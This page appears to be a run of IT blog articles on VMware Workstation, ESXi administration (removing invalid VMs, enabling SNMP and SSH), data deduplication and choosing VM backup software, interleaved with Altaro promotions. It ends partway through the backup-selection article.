VMware Workstation is essentially an application installed on top of Windows which lets you run connected or isolated Virtual Machines. It’s best suited for developer’s who need access and control to deploy and test code or for systems administrators looking to test applications on the latest version of a particular Operating System, of which over 200 are supported in Workstation Player and Pro.

We’ve already explained that Workstation Player is the free version of Workstation Pro but when it comes to functional differences we’ve detailed those for you below:vmware player workstation pro feature comparisonVMware Workstation Player and Pro both get installed onto your Windows PC or Laptop, on which you can run your virtual machines. Pro is interesting because you can run as many Virtual Machines as your Windows PC or Laptop hardware can handle making it a great bit of software for running live product demonstrations or testing without needing access to remote infrastructure managed by another team. The key element here is to ensure your laptop or PC has enough resources available (CPU/Cores, RAM and HDD space) for the Virtual Machines that will be running on it.

Diving into some of the features that VMware Workstation Pro provides shows how much value for money that software is; Being able to take a snapshot of Virtual Machines is useful so that you can roll back a Virtual Machine to a particular date and time in just a few seconds. You can also clone Virtual Machines should you need many copies of the same VM for testing. Encryption is also available in the event that your local Virtual Machines contain sensitive information.

VMware Workstation Pro is, therefore, a mini version of ESXi, it’s not capable of clustering features but it is an extremely cost-effective way (Approximately $300 USD) to make use of some of the unused resources on your Windows machine.

Summary

In summary here are our definitions for everything covered in this article:

  • vSphere: vSphere is a naming convention or “brand” for a selection of VMware Infrastructure solutions including vCenter Server, ESXi, vSphere Replication and Update Manager.
  • vCenter Server: vCenter Server is one of the solutions under the vSphere suite. It is used to manage multiple ESXi servers and enabled cluster level and high availability features for ESXi servers and Virtual Machines. vCenter Server is generally purchased when paid versions of ESXi have been deployed.
  • Workstation Player: Workstation Player is free software by VMware that lets you run one Virtual Machine at a time within your Windows Operating System.
  • Workstation Pro: Workstation Pro is the same as Workstation Player but it requires a paid license which enables enterprise features such as the ability to run many Virtual Machines from your Windows PC or Laptop. Features such as Virtual Machine snapshots, cloning and encryption are also supported with Pro.
  • ESXi: ESXi is the enterprise-grade solution for running Virtual Machines in the datacentre. It is installed onto bare metal servers. There is a basic free version, suitable for labs and test environments but the paid versions are more suitable for running mission-critical virtual machines and applications for your business, enabling cluster level features such as High Availability.
  • Hits: 54134

5 Most Critical Microsoft M365 Vulnerabilities Revealed and How to Fix Them - Free Webinar

Microsoft 365 is an incredibly powerful software suite for businesses, but it is becoming increasingly targeted by people trying to steal your data. The good news is that there are plenty of ways admins can fight back and safeguard their Microsoft 365 infrastructure against attack.

5 Most Critical Microsoft M365 Vulnerabilities and How to Fix Them

This free upcoming webinar, on June 23 and produced by Hornetsecurity/Altaro, features two enterprise security experts from the leading security consultancy Treusec - Security Team Leader Fabio Viggiani and Principal Cyber Security Advisor Hasain Alshakarti. They will explain the 5 most critical vulnerabilities in your M365 environment and what you can do to mitigate the risks they pose. To help attendees fully understand the situation, a series of live demonstrations will be performed to reveal the threats and their solutions covering:

  • O365 Credential Phishing
  • Insufficient or Incorrectly Configured MFA Settings
  • Malicious Application Registrations
  • External Forwarding and Business Email Compromise Attacks
  • Insecure AD Synchronization in Hybrid Environments

This is truly an unmissable event for all Microsoft 365 admins!

The webinar will be presented live twice on June 23 to enable as many people as possible to join the event live and ask questions directly to the expert panel of presenters. It will be presented at 2pm CEST/8am EDT/5am PDT and 7pm CEST/1pm EDT/10am PDT.

 

  • Hits: 17752

The Backup Bible. A Free Complete Guide to Disaster Recovery, Onsite - AWS & Azure Cloud Backup Strategies. Best Backup Practices

onprem and cloud backupThe Free Backup Bible Complete Edition written by backup expert and Microsoft MVP Eric Siron, is comprised of 200+ pages of actionable content divided into 3 core parts, including 11 customizable templates enabling you to create your own personalized on-prem and cloud-based (AWS, Azure) backup strategy.

Part 1 and 2 are updated versions of previously released eBooks (Creating a Backup & Disaster Recovery Strategy and Backup Best Practices in Action) but Part 3 is a brand-new section on disaster recovery (Disaster Recovery & Business Continuity Blueprint) that includes tons of valuable insights into the process of gathering organizational information required to build a DR plan and how to carry it out in practical terms.

The Backup Bible is offered Free and is available for download here.

Let’s take a look at what’s covered:

The Backup Bible – Part 1: Fundamentals of Backup

Part 1 covers the fundamentals of backup and tactics that will help you understand your unique backup requirements. You'll learn how to:

  • Begin planning your backup and disaster recovery planning
  • Set recovery objectives and loss tolerances
  • Translate your business plan into a technically oriented outlook
  • Create a customized agenda for obtaining key stakeholder support
  • Set up a critical backup checklist

The Backup Bible – Part 2: Selecting your Backup Strategy

Part 2 shows you what an exceptional backup looks like on a daily basis and the steps you need to get there, including:

  • Choosing the Right Backup and Recovery Software
  • Setting and Achieving Backup Storage Targets
  • Securing and Protecting Backup Data
  • Defining Backup Schedules
  • Monitoring, Testing, and Maintaining Systems
  • Access both parts for free now and ensure you’re properly protecting your vital data today!

The Backup Bible – Part 3: Aligning Disaster Recovery Strategies to your Business Needs

Part 3 guides you through the process of creating a reliable disaster recovery strategy based on your own business continuity requirements, covering:

  • Understanding key disaster recovery considerations
  • Mapping out your organizational composition
  • Replication
  • Cloud solutions
  • Testing the efficacy of your strategy

the backup bible

One of the most useful features of The Backup Bible is the customizable templates and lists that enable the reader to put the theory into practice. These are found in the appendix but are linked in the text at the end of each relevant chapter. If you are going to read this book cover to cover it would be a good idea to fill out the templates and lists as you go through it, so by the time you’ve finished reading you’ll have a fully personalized backup action plan ready for you to carry out!

Sure, it’s not the most exciting aspect of an IT administrator’s job but having a reliable and secure backup and disaster recovery strategy could be the most important thing you do. I’m sure you’ve heard many data loss horror stories that have crippled organizations costing thousands, if not millions, of dollars. This free eBook from Altaro will make sure you’re not the next horror story victim.

Summary

The Backup Bible Complete Edition also works as a great reference guide for all IT admins and anyone with an interest in protecting organizational data. And the best thing of all: it’s free! Learn how to create your own backup and disaster recovery plan, protect and secure your data backup for both onsite/on-premises and cloud-based (AWS and Azure) installations plus more. What are you waiting for? Download your copy now!

  • Hits: 5259

SysAdmin Day 2020 - Get your Free Amazon Voucher & Gifts Now!

sysadmin day 2020 amazon voucherSysAdmin Day has arrived, and with it, gratitude for all the unsung heroes that 2020 has needed. Your hard work has made it possible for all of us to keep going, despite all challenges thrown our way. Now it is Altaro’s turn to thank YOU.

If you are an Office 365, Hyper-V or VMware user, celebrate with Altaro. Just sign up for a 30-day free trial of either Altaro VM Backup or Altaro Office 365 Backup – it's your choice!

sysadmin day 2020 altaro
What can you Win?

  • Receive a €/£/$20 Amazon voucher when you use your trial of Altaro Office 365 Backup or Altaro VM Backup.
  • Get the chance to also win one of their Grand Prizes by sharing your greatest 2020 victory with Altaro in an up to 60-seconds video.

What are you waiting for? Sign up now!

  • Hits: 6113

How to Fix VMware ESXi Virtual Machine 'Invalid Status'

In this article, we'll show you how to deal with VMs which are reported to have an Invalid Status as shown in the screenshot below. This is a common problem many VMware and System Administrators are faced with when dealing with VMs. We'll show you how to enable SSH on ESXi (required for this task), use the vim-cmd to obtain a list of the invalid VMs, use the vim-cmd /vmsvc/unregister command to unregister - delete the VMs and edit the /etc/vmware/hostd/vmInventory.xml file to remove the section(s) that references the invalid VM(s).

The Invalid Status issue is usually caused after attempting to delete a VM, manually removing VM files after a vMotion, a problem with the VMFS storage or even after physically removing the storage from the ESXi host e.g replacing a failed hdd.

esxi vm machine invalid status

Another difficulty with VMs stuck in an Invalid Status is that VMware will not allow you to remove or delete any Datastore associated with the VM e.g if you wanted to remove a HDD. For safety reasons, you must first remove or migrate the affected VM so that there is no VM associated with the Datastore before VMware allows you to delete it.

Concerned about your VM machines and their data? Download now your Free Enterprise-grade VM Backup solution

Related Articles:

The screenshot below shows ESXi failing to delete datastore 256G-SSD - which is used by VM FCX-ISE1 above, now reported to be in an Invalid Status:

esxi vm unable to delete datastore

As most System Administrators discover in these situations - they are pretty much stuck and the only way to remove the VM, now marked as 'Invalid', is to delete it as the Unregister option cannot be selected when right clicking on top of the VM:

esxi vm invalid status delete unregister option unavailable

Notice in the screenshot above how the Unregister or Delete menu options are not available.

The only method to delete this VM is to use the SSH console on the ESXi host and execute a number of commands. This implies that SSH has been enabled on the ESXi host.

Read our quick guide on “How to enable SSH on an ESXi host” if SSH is not enabled on your ESXi host.

Once ssh is enabled, connect to your ESXi host with any ssh client such as e.g Putty using your ESXi root credentials, then use the vim-cmd with the following parameters to obtain a list of the invalid VMs:

[root@esxi1:~] vim-cmd vmsvc/getallvms | grep invalid
Skipping invalid VM '8'
[root@esxi1:~]

From the command output it is apparent that VM No.8 is the one we are after.  As a last attempt we can try to reload the VM in hope it will rectify the problem by executing the vim-cmd vmsvc/reload command:

[root@esxi1:~] vim-cmd vmsvc/reload 8
(vmodl.fault.SystemError) {
   faultCause = (vmodl.MethodFault) null,
   faultMessage = <unset>,
   reason = "Invalid fault"
   msg = "Received SOAP response fault from [<cs p:03d09848, TCP:localhost:80>]: reload
vim.fault.InvalidState"
}

Unfortunately, no joy. We now need to proceed to unregister/delete the VM using the vim-cmd /vmsvc/unregister command as shown below:

[root@esxi1:~] vim-cmd /vmsvc/unregister 8

Once the command is executed, the invalid VM will magically disappear from the ESXi GUI interface:

esxi vm machine invalid vm deleted

Another way to delete the VM is to edit the /etc/vmware/hostd/vmInventory.xml file and remove the section that references the invalid VM. In the snippet below we need to simply remove the highlighted text:

<ConfigRoot>
  <ConfigEntry id="0000">
    <objID>1</objID>
    <secDomain>23</secDomain>
    <vmxCfgPath>/vmfs/volumes/5a87661c-a465347a-a344-180373f17d5a/Voyager-DC/Voyager-DC.vmx</vmxCfgPath>
  </ConfigEntry>
  …………
  <ConfigEntry id="0008">
    <objID>8</objID>
    <secDomain>54</secDomain>
    <vmxCfgPath>/vmfs/volumes/   </vmxCfgPath>
  </ConfigEntry>

</ConfigRoot>

When finished, simply save the vmInventory.xml file.

Summary

This article showed how to deal with an ESXi VM that is in an invalid status. We explained possible causes of this issue, how to enable SSH on ESXi and the SSH commands required to reload or delete the invalid VM. Finally we saw how to delete a VM by executing the vim-cmd /vmsvc/unregister command or editing the vmInventory.xml XML file.

  • Hits: 63897

How to Enable SNMP on VMware ESXi Host & Configure ESXi Firewall to Allow or Block Access to the SNMP Service

In this article we will show you how to enable SNMP on your VMware ESXi host, configure SNMP Community string and configure your ESXi firewall to allow or block access to the SNMP service from specific host(s) or network(s)

Enabling SNMP service on a VMware ESXi host is considered mandatory in any production environment as it allows a Network Monitoring System (NMS) access and monitor the ESXi host(s) and obtain valuable information such as CPU, RAM and Storage usage, vmnic (network) utilization and much more.

how to enable snmp on esxi host

Furthermore, an enterprise grade NMS system can connect to your VMware infrastructure and provide alerting, performance and statistical analysis reports to help better determine sizing requirements but also identify bottlenecks and other problems that might be impacting the virtualization environment.

Execution Time: 10 minutes

Related Articles:

Concerned about your VM machines and data? Download now your Free Enterprise-grade VM Backup solution

Enable SSH on ESXi

First step it to enable SSH on ESXi. This can be easily perform via the vSphere client, ESXi console or Web GUI. All these methods are covered in details in our article How to Enable SSH on VMware ESXi.

Enable and Configure ESXi SNMP Service

Once SSH has been enabled, ssh to your ESXi host and use the following commands to enable and configure the SNMP service:

esxcli system snmp set --communities COMMUNITY_STRING
esxcli system snmp set --enable true

Replace “COMMUNITY_STRING” with the SNMP string of your choice.

Enable SNMP on ESXi Firewall

Next step is to add a firewall rule to allow inbound SNMP queries to the ESXi host. There are two scenarios here:

  • Allow traffic from everywhere
  • Allow traffic from specific hosts or networks

Allow SNMP Traffic from Everywhere

The below rules allow SNMP traffic from everywhere – all hosts and networks:

esxcli network firewall ruleset set --ruleset-id snmp --allowed-all true
esxcli network firewall ruleset set --ruleset-id snmp --enabled true

Allow SNMP Traffic from Specific Hosts or Networks

The below rules allow SNMP traffic from host 192.168.5.25 and network 192.168.1.0/24:

esxcli network firewall ruleset set --ruleset-id snmp --allowed-all false
esxcli network firewall ruleset allowedip add --ruleset-id snmp --ip-address 192.168.5.25
esxcli network firewall ruleset allowedip add --ruleset-id snmp --ip-address 192.168.1.0/24
esxcli network firewall ruleset set --ruleset-id snmp --enabled true

Block Host or Network from Accessing SNMP Service

To block a previously allowed host or network from accessing the SNMP service simply execute the following command(s):

esxcli network firewall ruleset allowedip remove --ruleset-id snmp --ip-address 192.168.5.25
esxcli network firewall ruleset allowedip remove --ruleset-id snmp --ip-address 192.168.1.0/24

Restart SNMP Service

Now that everything is configured, all we need to do is restart the SNMP service using the following command:

/etc/init.d/snmpd restart

Summary

In this article we explained the importance and usage of the SNMP Service for VMware ESXi Hosts and vCenter. We explained how to enable the SNMP Service on an ESXi host, configure the SNMP community string (public/private) and provided examples on how to configure the ESXi Firewall to control SNMP access to the ESXi host.

  • Hits: 15849

How to Enable or Disable SSH on VMware ESXi via Web GUI, vSphere Web GUI (vCenter), vSphere Client and Shell Console

SSH access to VMware’s ESXi server is by disabled by default however there are many reasons where SSH might be required. VMware and System administrators often find the need to perform advanced administrative tasks that require SSH access to the ESXi host. For example, deleting or reloading a VM with an Invalid Status can only be performed via SSH.

In this article, we’ll show you how to enable SSH on your ESXi host with just a few simple steps. This task can be achieved via the ESXi Web GUI, vSphere Web GUI (vCenter) vSphere client or ESXi console. We’ll cover all three methods.

Execution Time: 5 minutes

Security Tip: If your ESXi host management IP is not protected or isolated from the rest of the network, it is advisable to enable SSH on an as-needed basis.

Enabling and Disabling SSH Console on VMware ESXi via Web GUI

Log into your ESXi server and select the host from the Navigator window. Next, go to Action > Services and select the Enable Secure Shell (SSH) menu option:

vmware esxi enable ssh

This will immediately enable SSH. To disable SSH, repeat the same steps. You’ll notice that the Disable Secure Shell (SSH) option is now available:

vmware esxi disable ssh

Enabling and Disabling SSH on VMware via vSphere Web GUI Client (vCenter)

For those with a VMware vCenter environment, you can enable SSH for each ESXi host by selecting the host and then going to Manage > Settings > Security Profile > Edit.  In the pop-up window, scroll down to SSH Server and tick it. Optionally enter the IP address or network(s) you require to have SSH access to the host:

vmware esxi enable ssh vsphere web gui

Enabling and Disabling SSH on VMware ESXi via vSphere Client

Launch your vSphere client and log into your ESXi host. From vSphere, click on the ESXi host (1), then select the Configuration tab (2). From there, click on the Security Profile (3) under the Software section. Finally click on Properties:

vmware esxi enable ssh via vsphere client

On the pop-up window, select SSH and click on the Options button: vmware esxi enable ssh via vsphere client remote access

Select the required Startup Policy. Note that the ‘Start and stop with host’ option will permanently enable SSH. Next, click on the Start button under Service Commands to enable SSH immediately. When done, click on the OK button:

vmware esxi enable ssh via vsphere client start stop

To disable the SSH service via vSphere, follow the same process as above and ensure you select the “Start and stop manuallyStartup Policy option and click on the Stop button under the Service Commands section.

Enabling and Disabling SSH Console on VMware ESXi via ESXi Console

From your ESXi console, hit F2 to customise the system:

vmware esxi enable ssh via console

At the prompt, enter the ESXi root user credentials:

vmware esxi enable ssh via console

At the next window, highlight Troubleshooting Options and hit Enter:

vmware esxi enable ssh via console

Next, go down to the Enable SSH option and hit Enter to enable SSH: vmware esxi enable ssh via console

Notice that ESXi is now reporting that SSH is enabled:

vmware esxi enable ssh via console 5

Now hit Esc to exit the menu and logout from the ESXi host console.

Summary

In this article we showed how to enable and disable the SSH service on a VMware ESXi host using the Web GUI, vSphere client and ESXi Console. We explained why the SSH service is sometimes required to be enabled and also noted the security risks in permanently enabling SSH.

  • Hits: 29660

World Backup Day with Free Amazon Voucher and Prizes for Everyone!

Celebrate World Backup Day and WIN with Altaro!

We all remember how grateful we were to have backup software when facing so many data loss mishaps and near-catastrophes.

world backup day 2020 - win with altaro

If you manage your company's Office 365 data, celebrate this World Backup Day with Altaro. All you have to do is sign up for a 30-day free trial of Altaro Office 365 Backup. There’s a guaranteed Amazon voucher in it for you, and if you share your biggest backup mishap with them, you get a chance to WIN one of the grand prizes

  • DJI Mavic Mini Drone FlyCamQuadcopter,  
  • Google Stadia Premiere Edition, 
  • Ubiquity UniFiDream Machine  
  • Logitech MX Master 3 Advanced Wireless Mouse

What are you waiting for? Offer expires on the 22nd of April so  Sign up now!

Good luck & happy World Backup Day! 

 

  • Hits: 3651

Understanding Deduplication. Complete Guide to Deduplication Methods & Their Impact on Storage and VM Backups

data deduplication process vm backupWhen considering your VM backup solution, key features such as deduplication are incredibly important. This is not simply from a cost perspective but also an operational one. While is it true that deduplication of your backup data can have considerable cost savings for your business, it is also true that the wrong type of deduplication can often have negative performance and contribute to a negative end-user experience.

This article will explore the various deduplication types including general Inline Deduplication and Altaro’s Augmented Inline Deduplication for your VM Backup Storage. We'll also cover deduplication concerns such as software interoperability, disk wear, performance and other important areas.

Key Topics:

Concerned about your VM machines and their data? Download now your Free Enterprise-grade VM Backup solution

Related Articles:

Deduplication Basics

In fundamental terms, deduplication is the process of minimizing the amount of physical storage required for your data. In this article, we are using your VM backups as the data subject.

While physical storage costs are improving year on year, storage is still a considerable cost for any organization which is why deduplication techniques are being included into common data handing products such as backup software for your Virtual Machines.

There are various forms of deduplication available and it’s imperative to understand each one as all of them have various cost-saving vs performance trade-offs.

File-Based Deduplication

File-based deduplication was popular in the early days of deduplication however this method’s shortcomings became quickly apparent. With this method, files would be examined and checked to ensure identical files wouldn’t be stored a second time. The problem here was that much of a file could be identical to other files despite being named differently and having a different time-stamp. Furthermore other file-level differences would make the deduplication engine to mark the file as unique which would force the whole file to be backed up.

The end result is a significant amount of data being backed up multiple times, reducing the efficiency of the file-based deduplication engine.

Block-Level Deduplication

Block-level deduplication is the evolution of file-based deduplication which successfully addresses the shortcomings of its predecessor. With this method, the deduplication engine now examines the raw blocks of data on the filesystems themselves.  By concentrating on the raw blocks of data the deduplication engine no longer worries about the overall file a block is part of and can accurately understand the type of data the raw block contains.

The end result is a very efficient and intelligent deduplication engine that is capable of saving more space on the backup target.

To help better understand the block-level deduplication engine, we’ve included an example of how this process works with Altaro’s VM Backup solution.  Our example consists of 3 VMs and the diagram shows how each VM’s data is broken into different blocks (A to E).

In Phase 1, block-level deduplication is performed across each VM resulting in a significant saving of 110GB of space across all VMs. In Phase 2, block-level deduplication is performed across all VMs achieving an amazing 118GB reduction of storage space!

So far, Altaro’s VM Backup has saved 228GB of storage space which represents an impressive 47% reduction of VM Backup storage! In Phase 3, the deduplicated data is compressed to just 151GB and transferred to the backup storage.

block level deduplication vm backup

As noted in the diagram above, the overall VM backup storage requirements has been reduced from 481GB to just 151GB – representing a 68.8% reduction in size and allowing you to have more backups using much less storage space.

Download your free copy of Altaro's VM Backup Solution - Free for specific number of physical hosts!

Post-Process Deduplication

Compared to other deduplication options, post-process deduplication is a more simple form. All VM backup data is sent to the target storage device for your backups. After this, on a schedule, a process runs on the backup device to remove duplicated data.

post process deduplication

While this is simple in that no agents are required on your Virtual Machines, your target backup device will need to be large enough to cater for all backup data. Only after the data is there, will you see a reduction of data in time for the next day’s worth of backups.

Post-process is also problematic because you might need to enforce a “blackout window”, this being a period of time when you should not perform any backups because the storage device is busy moving data around and running the deduplication process.

The benefit of post-process deduplication though, is that it does deduplicate your data and not only on a per VM or per backup window but it often (depending on the implementation and vendor) will deduplicate across all backed up data. This can have a massive space-saving benefit, but only after the deduplication process has run.

Inline Deduplication

Inline Deduplication is an intelligent form of deduplication because it usually runs deduplication algorithms (processing) as the data is being sent to the target storage device. In some cases, the data is processed before it is sent along the wire.

inline deduplication process

In these scenarios, you can benefit from a target storage device with a lower storage capacity than traditionally required, reducing your backup storage target costs. Depending on the type of data being backed up and the efficiency of the deduplication technology by your vendor, savings can range significantly.

Consider a scenario where you are backing up the same operating system a hundred or more times, deduplication savings would expected to be quite good.

Since inline deduplication does not run on the target storage device, the performance degradation on the device is typically lower than other methods. This corresponds to higher throughput available for more backups to run sequentially, allowing for your VM backups to complete within scheduled backup windows.

The main benefits of inline-deduplication are that your target storage device can have a lower capacity than originally required, additional similar workloads will not add much data to the target and the storage target performance is better than when using other deduplication options. You also benefit from less disk wear which can cause a problem with both HDD and SSD drive types.

One of the drawbacks though is that depending on the implementation, in-line deduplication might not deduplicate your VM job’s worth of data across all data on the target storage array. The implementation could be on a per VM or per-job basis resulting in lower deduplication benefits than other methods.

Augmented Inline Deduplication

Augmented in-line deduplication is an implementation of in-line deduplication used by Altaro’s VM backup solution.

In this implementation, variable block sizes are used to maximise deduplication efficiency. This is all achieved with very low memory and CPU requirements, resulting in extra space for more backups in less space than without any deduplication in place.

deduplication and compression

Another important consideration here is that less bandwidth is required to ship your VM backup data to the backup storage system. If your backup infrastructure is located in a different building or geographic location, bandwidth can get expensive. Now that data is deduplicated before it is sent across the wire, the bandwidth requirements are reduced significantly.

Altaro’s implementation is impressive because it’s a form of inline deduplication, promising deduplication across all backed up data.

In the graphic below we can see that data is shipped to a central backup target from various Virtual Machines. While this is happening, deduplication processes are running.

vm backup with augmented inline deduplication

The benefits of such a solution are clear;

  • Very Fast backups. There is no storage performance lost as there are no post-processes running on the storage target.
  • Excellent deduplication rates. Deduplication occurs between the source data and ALL data on the backup target. If the data is already in the backup storage device, it will not be copied to the destination storage again, saving space.
  • No operational overhead. There are no agents to install or manage. Installation of the feature is a simple checkbox.
  • No additional SSD or HDD wear on the target. Since there are no post-processes there is no “double touch” of the backed up data. This significantly reduces the wear on HDDs and SSDs resulting in fewer disk failures.

Deduplication Gotchas

If your backup software comes with deduplication as standard, then there is no reason to not use it? This statement is incorrect! You must consider the type of deduplication in use and the overall impact it has on your backup systems.

Software Interoperability

A key consideration when analysing backup solutions is feature interoperability. Some backup vendors will not support deduplication with other features. An example of this is a storage device which runs post-process deduplication combined with backup software that supports instant VM recovery.

Instant VM recovery, direct from the backup target can be a very beneficial feature for your business, however, you must ensure that the vendor supports this feature on deduplicated storage targets (if this is the type of system your business has in place.)

Performance

From a performance perspective, there is no point in having a smart deduplication system if it’s slowing your backups down to the point you cannot complete them. Be sure to trial deduplication features to correctly assess the performance impact on your platforms. Also ensure that there is little or no impact on production Virtual Machines. We know that post-process deduplication has no effect on production workloads, but it is possible that in-line can, so it should be tested.

A quick way to check performance would be to compare backup times before enabling deduplication features with afterwards. From here you can look at a cost-saving vs performance analysis to consider which is better for your business.

Disk Wear

Take a look the SMART data for your disks after enabling deduplication for an extended period of time. If the wear-out time on SSDs is significantly reduced, then consider an inline deduplication feature rather than post-process.

Operations

If enabling deduplication means installing, upgrading and generally managing agents everywhere, consider another solution which does not require agents. Agents will also consume CPU and Memory which can negatively impact the end-user experience of your applications.

For post-process deduplication ensure you are not limited to time windows for your backups and restores. Also, check the performance of this feature, especially on large backup targets.

The Impact of Augmented Inline Deduplication for VM backups

Deploying a VM backup solution that uses augmented inline deduplication is a great idea if you have limited space on an existing backup target. It’s also a good fit if you are looking at a more expensive SSD option, but do not want to stretch your IT budget to one that will natively store multiple copies of the same Virtual Machine.

An example of some of the storage savings can be seen in the below graphic:

altaro augmented inline deduplication

Most organizations have multiple Virtual Machines with the same operating system. A typical Windows Server can have around 20GB of data just for the Operating System. Consider 100’s of similar VMs with daily backups and long retention policies. The savings can be considerable.

Unlike physical machines, VMs do not usually require additional agents for deduplication or backups to run - there are some exceptions of course.

Summary

In this article we covered the basics on deduplication, analyzed Post-Process Deduplication, Inline Deduplication and Augmented Inline Deduplication. Further more, we explained the strengths and weakenesses of each deduplication method and provided examples on how organizations can leverage deduplication backups for their VM backups and save space and money.

To wrap-up, there are almost no reasons why a deduplication capable VM backup solution should be ignored when choosing your backup platform. There are some caveats depending on your business and technical requirements, but there are several options available to get started with deduplication.

Fortunately, for the most part, Altaro’s Augmented Inline Deduplication features are a good fit for most scenarios and are available at a competitive price point.

Remember, when selecting your VM backup solution, consider the limitations of the various kinds of deduplication and go with what works best for your business.

  • Hits: 10059

FREE Webinar - Fast Track your IT Career with VMware Certifications

Everyone who attends the webinar has a chance of winning a VMware VCP course (VMware Install, Config, Manage) worth $4,500!

Climbing the career ladder in the IT industry is usually dependent on one crucial condition: having the right certifications. If you’re not certified to a specified level in a certain technology used by an employer, that’s usually a non-negotiable roadblock to getting a job or even further career progression within a company. Understanding the route you should take, and creating a short, medium, and long term plan for your certification goals is something everyone working in the IT industry must do. In order to do this properly you need the right information and luckily, an upcoming webinar from the guys at Altaro has you covered!

Fast Track your IT Career with VMware Certifications is a free webinar presented by vExperts Andy Syrewicze and Luke Orellana on November 20th outlining everything you need know about the VMware certification world including costs, value, certification tracks, preparation, resources, and more.

Free vmware certification webinar

In addition to the great content being discussed, everyone who attends the webinar has a chance of winning a VMware VCP course (VMware Install, Config, Manage) worth $4.5k! This incredible giveaway is open to anyone over the age of 18 and all you need to do to enter is register and attend the webinar on November 20th! The winner will be announced the day after the webinar via email to registrants.

VMware VCP Certification is one of the most widely recognized and valued certifications for technicians and system administrators today however the hefty price tag of $4.5k puts it out of reach of many. The chance to get this course for free does not come along every day and should definitely not be missed!

While the event date has passed, it has been recorded and is available for viewing. All material are available as direct downloads. Click here to access the event.

  • Hits: 6163

6 Key Areas to Consider When Selecting a VM Backup Solution

vm backup considerationsBackup and Disaster recovery are core considerations for any business with an IT footprint, whether that is on-premises or in the cloud.

Your business depends on reliable IT systems to support the business's core functions. Even a short 1-hour outage can cause considerable disruption and have a financial impact to the business. Given our ever-growing reliance on IT systems, it is important more than ever to choose the right VM Backup software for your business to protect your Virtual Infrastructure (Vmware, Hyper-V) and business data in the case of a system failure or security incident while at the same time provide fast individual file or folder, server database or entire VM restoration.  

By utilizing Altaro VM Backup as a case study, this article will guide you through the following main 6 areas which you should consider when choosing your VM Backup solution:

Analyze Your Business Requirements

The most important part of electing a backup solution is to ensure that the solution will meet your requirements.

There are various requirements that you might have, a few examples are:

Number of Virtual Machines and Hosts

You need to ensure that the backup software is capable of handling the size of your virtualized estate. So if your total number of VM hosts is very large or changing constantly, then you might want to ensure that the solution is scalable and it is easy to add additional workloads into the platform.

Type of Backup Storage

Most backup solutions for a virtualized environment are software-based, meaning that they run on top of a Window Server installation or from within their own appliance which you deploy to your virtualized platform. Other options include a physical appliance with storage built-in.

If you already have storage infrastructure in place, ensure that your choice of backup solution allows connectivity to this backup target natively. If you are looking for a storage device for the backups, consider one which supports a simple standards that works over existing networking infrastructure such as NAS or SMB Network Share.

Specialist Features

Be sure to analyse any existing features that you are using or consider new ones as part of your backup solution selection process.

Some of the features to consider include:

Deduplication

Deduplication of the storage used at the target backup location can significantly reduce the amount of storage that is needed to host your backups. Check with your backup vendor what the average deduplication rates are and ensure you check any small print that is attached to any claims.

When we look at duplication from Altaro’s perspective, they rightfully boast how they can outperform event their closest competitors. With Altaro, you can backup 858GB of VM data into only 390GB of space. Imagine the backup storage costs savings there:

augmented inline deduplication example

Try Altaro's Free VM Backup Solution - Download Now

WAN Optimisation

If you are backing up your Virtual Machines to a secondary site, over a WAN connection then consider a solution which includes WAN Optimisation. Bandwidth isn’t free which is how WAN optimisation can help. Backup data is compressed.

In some better implementations, only data that the backup storage doesn’t already have will be sent over the WAN. This can drastically save your bandwidth and avoid “burst” costs by your ISP. WAN Optimization can also free up the link for other uses and applications.

Guest Quiescing

If you have databases which require backing up, then ensure your selected solution supports backing up of your databases type and version. In this scenario is not enough to backup Virtual Machines on their own. Typically for databases, an agent needs to be deployed to the machine which will instruct the database to flush all writes that are in memory to disk. If you don’t do this then there is a risk that the database will not restore correctly. Something to keep in mind is that with Altaro, Exchange, SQL and other applications only require VMware tools for VMware vSphere environment for guest quiescing. No additional agents are required.

vm backup - guest quiescing

Instant Restore

Instant restore is a more modern approach to restoring Virtual Machines. Some providers will allow you to instantly map the backup file to your systems so that you can get back online in seconds rather than waiting for several hours for a restore to complete.

Altaro aims to meet all of these business requirements through their VM Backup solution. Altaro supports all common storage types out of the box (Network Drive, NAS, iSCSI, eSATA and USB) with no advanced configuration required:

vm backup select backup location

Furthermore, all of the advanced features that you can think of are supported by Altaro VM Backup including Deduplication, WAN Optimisation, Guest Quiescing via VMware Tools and Instant Restore Technology to bring your backups online in just a few seconds, regardless of their size.

VM Backup - Billing Model & Price

There are various billing models out there these days. Most solutions will charge you a fee per server CPU or by the number of Virtual Machines. Then there is usually a maintenance fee on top which covers support and entitlement to new versions of the software.

With various options available, work out if a per CPU or per VM option is more advantageous for your business. This applies for the long term, so forecast this pricing out over 3 or 5 years. It might also be a good time to see if you can consolidate your Virtual Machines down onto fewer hosts and go for a host orientated option rather than per VM.

It would also be wise to look into deals on longer-term agreements and If you have a large estate, to see if there are discounts for signing up to a larger commitment.

Some vendors will offer an OPEX model rather than a fixed price upfront CAPEX solution. Paying monthly can help with budgets so check with your vendor about the options.

When we look at Altaro VM Backup, the billing model is simple; all you need is the number of hosts in your environment and the edition of the software you wish to purchase. 24/7 support upgrades are included for the first year too; you can purchase software maintenance agreements (SMA) for continued upgrade and Technik support in future years. Altaro does not bill you on the number of VMs or sockets so you can leverage a cost-saving over the competition here.

VM Backup – Security & Encryption

Security is a growing concern so don’t fall into the gap and forget about it when looking at your backup solution:

  • Check to ensure your chosen solution’s backups can put an air gap in place for your production Virtual Machines to prevent the spread of threats such as crypto-locker to your backups.
  • Do you need to encrypt your VM backups? This can slow down your backup jobs and prevent some features from working so ask your shortlisted vendors what the deal is here.
  • For ultra-security conscience businesses, you might want your backups to be encrypted as the data is sent down the network to your storage device. This can be advantageous, but there are sometimes cheaper options such as using a VPN or a dedicated VLAN to help protect you to a certain degree.
  • Backup software such as Altaro can use the inbuild Encryption feature which would encrypt all backups with an AES 256bit Encryption (Military Grade) hence preventing from having one encrypting backups manually and possibly rendering the backups not accessible even to the backup solution itself.

Try Altaro's Free VM Backup Solution - Download Now

Vendor Reputation

Before signing up to a contract with a backup vendor, ask yourself the  following questions

  • How long has the company been in business?
  • How many version of the software has been released?
  • Is the software supported by your virtualization vendor (VMware/ HyperV etc)?
  • How quickly does the backup vendor’s software support a recently released update from your Virtualization vendor?

For peace of mind, Altaro wins awards every year which are published on their website. They have over 30 awards to their name and a series of impressive independent reviews. Altaro also boast over 50,000 customers including:

altaro vm backup customers

Vendor Support

When things go wrong and you have to rely on your backup solution to save the day, you need to know that the vendor support is ready to help you should you need them. Here are some things to consider:

Support Reviews

